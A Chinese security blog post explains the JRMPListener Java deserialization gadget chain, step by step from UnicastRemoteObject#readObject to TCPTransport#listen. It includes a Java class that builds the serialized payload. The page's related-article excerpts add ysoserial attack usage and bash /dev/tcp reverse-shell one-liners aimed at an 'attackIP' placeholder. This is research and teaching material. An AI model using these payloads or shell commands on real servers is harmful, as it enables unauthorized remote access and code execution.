JRMPClient 反序列化

最新推荐文章于 2022-03-11 15:09:36 发布
最新推荐文章于 2022-03-11 15:09:36 发布
阅读量864 收藏
点赞数
分类专栏: java安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122704343
版权

JRMPClient 反序列化

当目标存在反序列化入口时,可以尝试构造反序列化链让目标在指定端口开启 JRMP 服务,这样我们就可以连接目标开启的 JRMP 服务进行一些后续操作。

Gadget

/*
 * Gadget:
 *   UnicastRemoteObject#readObject
 *     UnicastRemoteObject#reexport
 *       UnicastRemoteObject#exportObject
 *         UnicastRemoteObject#exportObject
 *           UnicastServerRef#exportObject
 *             LiveRef#exportObject
 *               TCPEndpoint#exportObject
 *                  TCPTransport#exportObject
 *                    TCPTransport#listen
 * */

UnicastRemoteObject#readObject 调用 UnicastRemoteObject#reexport 方法

image-20220124221648216

UnicastRemoteObject#reexport 方法调用 UnicastRemoteObject#exportObject 方法

image-20220124221723793

传入指定的端口实例化 UnicastServerRef 对象

image-20220124221823395

跟进一下实例化过程

image-20220124221844486

跟进实例化 LiveRef 的过程,ObjID 对象主要用来标识的,在这里没啥作用,这里构造方法有很多重载,我们关注 ep 属性的赋值

image-20220124222131995

跟进 TCPEndpoint#getLocalEndpoint 方法,传入的参数为指定的端口,这里是关键的地方,主要用来创建一个 TCPEndpoint 对象并对其进行操作之后返回。

image-20220124222331076

具体逻辑捋一捋,这里看一个比较关键的地方,实例化一个 TCPTransport 并赋值给 var3.transport

image-20220124222726328

跟进一下实例化的过程,发现是把传入的参数赋值给了 epList 属性,这个挺关键的,后面会用到

image-20220124222825092

然后操作完成之后返回 var3,这里相当于是把 var3 赋值给 ep 属性

image-20220124222932800

实例化 LiveRef 出来之后调用 UnicastServerRef 的父类构造,把实例化出来的 LiveRef 赋值给 ref 属性

image-20220124223942906

实例化完之后回到 exportObject 方法

image-20220124222958498

调用 UnicastRemoteObject#exportObject 方法

image-20220124223057775

然后调用 UnicastServerRef#exportObject 方法

image-20220124224130529

调用 ref 属性的 exportObjec 方法,ref 属性根据前面分析就是 LiveRef

image-20220124224233486

调用 ep 属性的 exportObject 方法,ep 属性就是 TCPEndpoint ,那么调用 TCPEndpoint#exportObjec

image-20220124224333673

接着调用 transport 属性的 exportObject 方法,transport 属性就是 TCPTransport,那么就调用 TCPTransport#exportObject 方法

image-20220124224458518

这里接着调用 TCPTransport#listen 方法

image-20220124224537417

看一下 getEndpoint 方法,这里返回的就是 epList 属性,前面这个属性被设置有内容的

image-20220124224644170

最后获取端口等信息开启 JRMP 服务

image-20220124224728431

public class JRMPListener {

    public static byte[] getSerializeData() throws Exception{
        UnicastRemoteObject unicastRemoteObject = (UnicastRemoteObject) Reflect.reflectGetObject("java.rmi.server.UnicastRemoteObject", new Class[]{}, new Object[]{});
        // 反射修改 port 属性
        Reflect.reflectSetField(unicastRemoteObject,"port", Integer.parseInt(ParseArgs.JRMPListenerPort));
        byte[] bytes = SerWithUnSer.serialize(unicastRemoteObject);
        return bytes;
    }

    public static void main(String[] args) throws Exception{
        ParseArgs.parseArgs(args);
        byte[] bytes = getSerializeData();
        SerWithUnSer.unSerialize(bytes);
    }
}
0x6b79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jrmp协议_从防护角度看Weblogic反序列化历史漏洞
weixin_34703307的博客
01-14 252
一、前言Weblogic反序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果。随着每次补丁的修复,很多Weblogic反序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面...
ysoserial payloads/JRMPClient
洋洋的小黑屋
07-27 504
ysoserial payloads/JRMPClient 环境:JDK8u102 payloads/JRMPClient可以配合exploit/JRMPListener模块来使用 1.在自己服务器上使用exploit/JRMPListener来开启监听 2.把payloads/JRMPClient发送给对方服务器,对方服务器反序列化后会反向连接我们的服务器,进行连接之间我们服务器会发送payload给对方服务器进行反序列化执行命令。 以下是执行ysoserial时候使用的命令: java -cp ysos
java 反序列化 ysoserial exploit/JRMPClient 原理剖析
whatday的专栏
06-26 3320
目录 0 前言 1payloads/JRMPListener 1.1 payload生成 1.2gadget链分析 2使用RMIRegistryExploit攻击上述开启的监听 3 exploit/JRMPClient 3.1分布式垃圾收集(DGC) 3.2exploit/JRMPClient代码分析 4 总结 0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:...
poc weblogic 漏洞利用_【漏洞预警】WebLogic T3 反序列化绕过漏洞 & 附检测POC
weixin_39837867的博客
12-21 269
漏洞描述Oracle FusionMiddleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。Oracle官方发布了4月份的关键补丁更新CPU(Critical PatchUpdate),其中包含一个高危的Web...
Java反序列化漏洞
ovowovo的博客
12-10 1038
Ysoserial 介绍 Ysoserial是国外一款安全工具,集合了各种java反序列化payload,下载地址: https://github.com/frohoff/ysoserial/ 使用方法 1、首先使用ysoserial在攻击机上启动一个 JRMP server,输入以下命令 java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.j...
jrmp协议_ysoserial JRMP相关模块分析(二)- payloads/JRMPClient & exploit/JRMPListener
weixin_39876145的博客
12-24 674
简介payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的,payloads/JRMPClient 的利用,离不开 exploit/JRMPListener ,反之 exploit/JRMPListener 的利用,在上篇文章中,它是可以独立使用的这篇文章是记录 payloads/JRMPClient 的...
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
反序列化工具
11-14
Java反序列化是一种将已序列化的对象状态转换回对象的过程,通常用于持久化数据或在网络间传输对象。在Java中,这个过程涉及到`ObjectInputStream`类的`readObject()`方法,它能够读取由`ObjectOutputStream`的`...
c#序列化和反序列化
05-24
什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
序列化与反序列化
12-21
序列化与反序列化 概述 序列化: 就是使用流的技术将对象中的数据保存到文件中。 反序列化: 就是使用流的技术将文件中的数据读取到对象中。 使用到的流技术 序列化:ObjectOutputStream 反序列化:...
C# xml序列化和反序列化
最新发布
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
ysoserial之JRMP源码分析(payloads.JRMPClient/exploit.JRMPListener)
weixin_45682070的博客
03-11 1359
前言 本来是想复现weblogicCVE-2017-3248漏洞的,这个漏洞使用了ysoserial的jrmp模块,开启rmi监听进行通信的,达到执行任意反序列化 payload。下文有些概念比较晦涩难懂,建议查阅其他资料配合使用。 JRMP协议是什么 JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。 一个RMI的过程,是用到JRMP这个协议去组织数据格式然后通过TCP进行传输,从而达到RMI,也就是远程方法调用。 JRMP是一个协议,是用于Java RMI
ysoserial exploit/JRMPClient
洋洋的小黑屋
07-27 336
ysoserial exploit/JRMPClient 上一篇文章讲到,当服务器反序列化payloads/JRMPListener,即会开启端口监听。再使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 调用链分析 设置payloads/JRMPListener参数,端口号为1299,debug模式启动payloads/JRMPListener模块。 设置exploit/JRMPClient模块设置参数为127.0.0.1 1299
jrmp协议_Java远程方法调用RMI利用分析
weixin_28358083的博客
12-24 591
前提了解JNDIJNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JRMPJav...
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 2884
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
java rmi 存根是什么_Java RMI – UnicastRemoteObject:UnicastRemoteObject.exportObject()和扩展UnicastRemoteObje...
weixin_39915700的博客
02-16 372
我正在准备考试,我有一个问题,希望有人能回答我。它关于RMI和远程对象。我不知道为什么这两个实现之间有很大的区别。一个是扩展UnicastRemoteObject,而另一个则以UnicastRemoteObject的形式导出该对象。我没有真正的区别 – 顺便说一句,这只是一个很简单的例子:-)接口:public interface EchoI extends Remote {public Stri...
理解RMI、JRMP、JNDI、java反射
Shanfenglan's blog
04-15 2167
文章目录1. RMI2. JRMP3. JNDI4.实现的效果5. 利用方式终结参考文章 1. RMI RMI是一种行为,一种跨越主机进行远程方法调用的行为。 通俗点理解当前主机的一个java文件调用了远程某个主机上的某个java文件中的某个方法,这种行为就叫做RMI。 我们模拟一种场景: 远程主机上有一个类是cat。 当前主机上通过RMI这种行为调用了远程主机上的类来创建一个对象,并进行后续使用。 上面这种行为就是RMI。 2. JRMP 这是一个协议,用来定义RMI这行为过程中数据传输的规范。 R
Apache shiro1.2.4 Getshell
zhalang8324的博客
06-16 741
方法一 利用JRMPClient 反弹shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1 0<&196;exec 196<>/dev/tcp/attackIP/7777; sh <&196 >&196 2>&196 P

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值